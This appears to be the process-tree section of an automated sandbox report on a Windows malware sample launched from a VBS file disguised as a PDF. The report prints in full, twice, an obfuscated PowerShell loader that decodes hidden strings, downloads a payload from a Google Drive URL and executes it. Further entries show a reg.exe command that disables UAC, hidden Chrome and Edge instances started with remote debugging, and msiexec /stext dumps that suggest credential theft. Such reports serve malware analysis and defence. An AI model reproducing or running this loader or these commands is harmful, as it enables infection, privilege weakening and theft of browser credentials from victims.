PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3056 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3056 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4772 wrote to memory of 3020 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EE85716273·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD MagoClonwB,rwnRusll KviostejaNatudPulsFFo miVacalMarceCowo(A to$W,doG SveetilsfHenvu inhlundelForttK aleKredf CroiXenosOc eh Dis,B,er$ ineRTndeeSkmteSa,nn B ulSkraiP.alsAlfat K.uiAfhjn antgStvr) ,ic ';$Reenlisting=$quakeric;Disrespecter (Umaadeholdenhed ' Squ$FrucG KyslUn.eOHundBNonaAForkLUnte:Photqb.inUJoinEInteM UdlAgranDSm doFors=Alve(ElekTEctreUrimsPar t f r-Ko tpOrdraOb iT Fa Hr of Prim$HoejRLe iEMedde S.iNBlokLOffeIDidoSPrfaTHymnIMaanNMajeGObdu)Suba ');while (!$quemado) {Disrespecter (Umaadeholdenhed 'Slut$Hemog,esmlMello MurbSlagaR ddlSter:SupeFTri,nOveruTwopgdebufTol,r Ocei Oute.men= Fje$PeritSmrrrHkleuConteEmpi ') ;Disrespecter $Incomprehended;Disrespecter (Umaadeholdenhed 'Svans TkkTvidea CloR ndutStil-KlipsCop lInosE emoeMongPPseu Refo4Spnd ');Disrespecter (Umaadeholdenhed 'Amph$EpheGPalml U voGennBDynaAOv.rl Sej: recqTestUBelrEt faMRingA Aphd oplOPoli= Unc(LightOff ERe eSDi itMona-AkkopAnimaNonfTTirrH Kin Al e$Nic.rMi rerovfeSigtnM jklanglIC ntSSkaftopreIOccunOr gGLino)Sig. ') ;Disrespecter (Umaadeholdenhed 'Soja$Tu ig,andLP edo MamBHockADatalFavn:OpfiRsyntES ifLG.rmaTa,kXOd eAKnstnMer t Ter=Kach$ asiG leuLUd aOUn ebMi,lAPreaLBai.:UnreP ExqrPolieT.irc,lloIRu.dRfalscSmaguSpecl EpiAA,chTKva eB.eg+ red+Resp%Cont$BalsTDis,U GodrF nat Intl co,E Oz DFre . Pi,C ompO etcUMininFestT,ksa ') ;$Gefulltefish=$turtled[$Relaxant];}$Fensmark=316424;$Raptusernes158=29872;Disrespecter (Umaadeholdenhed ' vru$ ShogStryLUrproSeclBZ.omaWileLFr a: Ca,nIgnaOUnfiNAppliPlanNFallT oneSammrBes,p UnhRKostEChamTBlomaEmbabCirkI.ampLInviiPladtSp lY Deb Samm=.col SquaG antEForfTC ga- LufcShoao TetnHjreTRegnENephnDacaTSwin Napo$Un xrpianEBli,EfilinHis L ideiCrumsTilbTbedyIHr sNBal,gDisk ');Disrespecter (Umaadeholdenhed ' Afh$MansgAtrolKar,oCostbSc ea ManlH er:Str OOxeapReprbA faeOutcvAnc aPacerTrkaiPennn blugGenesRat,sGreetta,meMal dSuggsFogg Non= Sel Vels[ FlaSTomoyVitrs raft nsieChurmDi.t.Ort CS uio podn angvJeaneAvler B.dt lec]Titi:Akts:In,pF emirRundoMagim ,duB Ud.aForms CoueUldt6Ecch4 UndSshiktAdulr FotiOutbnCancgCaro(Komm$ simN EksoRecanGenbiRygen.kvhtFil,eRrfrr SejpI dfrSpireTilktNotaaCornbKom,iPurilCykeiVorttBaigymedi)i.dt ');Disrespecter (Umaadeholdenhed ' nst$ tregPrinlBloko FinbCameAHandlPa k:TweeL De E GylvSupreTrykVDa te,andJAntie EufSBes. Tryk=D.fe eta[,avisS raYFal SUnabTMo oeOplomStro. RadTForsE Pl xB,lltduod.Imp eBanjnMus CInteo gladSteeIEtf.N .orGkr s]Ulff: Roc:RenvAAfspsfermC SkoiTilii C y.DestGBifoeChootSn.ts HeltGermRCithIGubeNNedsgAjax( Bde$MilloFletPFre,bAccoe,ltfvO dtAIn.er Su,I FarnGramg nomSGivesm,vetHe aeBed DLoneSF,em) emi ');Disrespecter (Umaadeholdenhed 'Ikeb$Lej GRgerlAtmooNonmbAmarAJensL Inv:Hamil R,tAOverSAkkoESociR SkoPBundRDaydiVestnspecT UnseSpalROutsDtalvEPr afTherI TogNOv rI regTSuprI BinOWoodnc rds U l=Rigs$ NatL OutEM trvBurle P cVGurnET anJ GolENormSsubj.R ngSDiplUVensb,olsSWildt coorRegiIHollNU,trg Dr (Evac$SenefFonteGoveN D ms chrmXystaSta r LevK imm, Kom$A,toRRecoaEi,ePTetrt onsu oorsBro EBaanr DagnSkolE BorsDobb1Sand5Ypp 8Damp)Unde ');Disrespecter $Laserprinterdefinitions;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD MagoClonwB,rwnRusll KviostejaNatudPulsFFo miVacalMarceCowo(A to$W,doG SveetilsfHenvu inhlundelForttK aleKredf CroiXenosOc eh Dis,B,er$ ineRTndeeSkmteSa,nn B ulSkraiP.alsAlfat K.uiAfhjn antgStvr) ,ic ';$Reenlisting=$quakeric;Disrespecter (Umaadeholdenhed ' Squ$FrucG KyslUn.eOHundBNonaAForkLUnte:Photqb.inUJoinEInteM UdlAgranDSm doFors=Alve(ElekTEctreUrimsPar t f r-Ko tpOrdraOb iT Fa Hr of Prim$HoejRLe iEMedde S.iNBlokLOffeIDidoSPrfaTHymnIMaanNMajeGObdu)Suba ');while (!$quemado) {Disrespecter (Umaadeholdenhed 'Slut$Hemog,esmlMello MurbSlagaR ddlSter:SupeFTri,nOveruTwopgdebufTol,r Ocei Oute.men= Fje$PeritSmrrrHkleuConteEmpi ') ;Disrespecter $Incomprehended;Disrespecter (Umaadeholdenhed 'Svans TkkTvidea CloR ndutStil-KlipsCop lInosE emoeMongPPseu Refo4Spnd ');Disrespecter (Umaadeholdenhed 'Amph$EpheGPalml U voGennBDynaAOv.rl Sej: recqTestUBelrEt faMRingA Aphd oplOPoli= Unc(LightOff ERe eSDi itMona-AkkopAnimaNonfTTirrH Kin Al e$Nic.rMi rerovfeSigtnM jklanglIC ntSSkaftopreIOccunOr gGLino)Sig. ') ;Disrespecter (Umaadeholdenhed 'Soja$Tu ig,andLP edo MamBHockADatalFavn:OpfiRsyntES ifLG.rmaTa,kXOd eAKnstnMer t Ter=Kach$ asiG leuLUd aOUn ebMi,lAPreaLBai.:UnreP ExqrPolieT.irc,lloIRu.dRfalscSmaguSpecl EpiAA,chTKva eB.eg+ red+Resp%Cont$BalsTDis,U GodrF nat Intl co,E Oz DFre . Pi,C ompO etcUMininFestT,ksa ') ;$Gefulltefish=$turtled[$Relaxant];}$Fensmark=316424;$Raptusernes158=29872;Disrespecter (Umaadeholdenhed ' vru$ ShogStryLUrproSeclBZ.omaWileLFr a: Ca,nIgnaOUnfiNAppliPlanNFallT oneSammrBes,p UnhRKostEChamTBlomaEmbabCirkI.ampLInviiPladtSp lY Deb Samm=.col SquaG antEForfTC ga- LufcShoao TetnHjreTRegnENephnDacaTSwin Napo$Un xrpianEBli,EfilinHis L ideiCrumsTilbTbedyIHr sNBal,gDisk ');Disrespecter (Umaadeholdenhed ' Afh$MansgAtrolKar,oCostbSc ea ManlH er:Str OOxeapReprbA faeOutcvAnc aPacerTrkaiPennn blugGenesRat,sGreetta,meMal dSuggsFogg Non= Sel Vels[ FlaSTomoyVitrs raft nsieChurmDi.t.Ort CS uio podn angvJeaneAvler B.dt lec]Titi:Akts:In,pF emirRundoMagim ,duB Ud.aForms CoueUldt6Ecch4 UndSshiktAdulr FotiOutbnCancgCaro(Komm$ simN EksoRecanGenbiRygen.kvhtFil,eRrfrr SejpI dfrSpireTilktNotaaCornbKom,iPurilCykeiVorttBaigymedi)i.dt ');Disrespecter (Umaadeholdenhed ' nst$ tregPrinlBloko FinbCameAHandlPa k:TweeL De E GylvSupreTrykVDa te,andJAntie EufSBes. Tryk=D.fe eta[,avisS raYFal SUnabTMo oeOplomStro. RadTForsE Pl xB,lltduod.Imp eBanjnMus CInteo gladSteeIEtf.N .orGkr s]Ulff: Roc:RenvAAfspsfermC SkoiTilii C y.DestGBifoeChootSn.ts HeltGermRCithIGubeNNedsgAjax( Bde$MilloFletPFre,bAccoe,ltfvO dtAIn.er Su,I FarnGramg nomSGivesm,vetHe aeBed DLoneSF,em) emi ');Disrespecter (Umaadeholdenhed 'Ikeb$Lej GRgerlAtmooNonmbAmarAJensL Inv:Hamil R,tAOverSAkkoESociR SkoPBundRDaydiVestnspecT UnseSpalROutsDtalvEPr afTherI TogNOv rI regTSuprI BinOWoodnc rds U l=Rigs$ NatL OutEM trvBurle P cVGurnET anJ GolENormSsubj.R ngSDiplUVensb,olsSWildt coorRegiIHollNU,trg Dr (Evac$SenefFonteGoveN D ms chrmXystaSta r LevK imm, Kom$A,toRRecoaEi,ePTetrt onsu oorsBro EBaanr DagnSkolE BorsDobb1Sand5Ypp 8Damp)Unde ');Disrespecter $Laserprinterdefinitions;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff80021cc40,0x7ff80021cc4c,0x7ff80021cc58

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1676,i,1752438386486747986,6371528032326138983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1664 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,1752438386486747986,6371528032326138983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,1752438386486747986,6371528032326138983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2324 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,1752438386486747986,6371528032326138983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,1752438386486747986,6371528032326138983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4560,i,1752438386486747986,6371528032326138983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,1752438386486747986,6371528032326138983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4736 /prefetch:8

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qjemytcxlbskfdcm"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\aljfrlnrzjkppjzqqfj"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\dfopsextvrcurxnuzqeyvyw"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4856,i,1752438386486747986,6371528032326138983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4412 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffffdee46f8,0x7ffffdee4708,0x7ffffdee4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16346737594269585079,20237595710529944,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16346737594269585079,20237595710529944,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,16346737594269585079,20237595710529944,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2076,16346737594269585079,20237595710529944,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2076,16346737594269585079,20237595710529944,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

